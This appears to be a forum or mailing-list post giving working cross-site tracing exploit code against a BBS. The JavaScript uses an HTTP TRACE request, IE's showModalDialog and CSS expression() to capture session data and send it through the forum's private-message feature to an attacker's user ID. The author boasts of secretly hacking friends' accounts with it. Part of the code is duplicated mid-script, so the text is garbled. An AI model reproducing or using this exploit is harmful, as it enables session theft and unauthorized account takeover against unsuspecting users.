It's really a terrible security hole. Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:
<script type="text/javascript">
function xssDomainTraceRequest(){
var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bb
s.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp
.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequ
estHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailme
ssage&userid=11111&subject=test&message=\" + xmlDoc)\;";
<script type="text/javascript">
function xssDomainTraceRequest(){
var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bb
s.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp
.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequ
estHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailme
ssage&userid=11111&subject=test&message=\" + xmlDoc)\;";
var target = "http://bbs.for.bar";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
showModalDialog(target, null, readyCode);
}
</script>
<script>
xssDomainTraceRequest();
</script>
Chen haiyan, CISSP
System Security Engineer
HENAN CFONLINE COMMERCE CO., LTD.
[ reply ]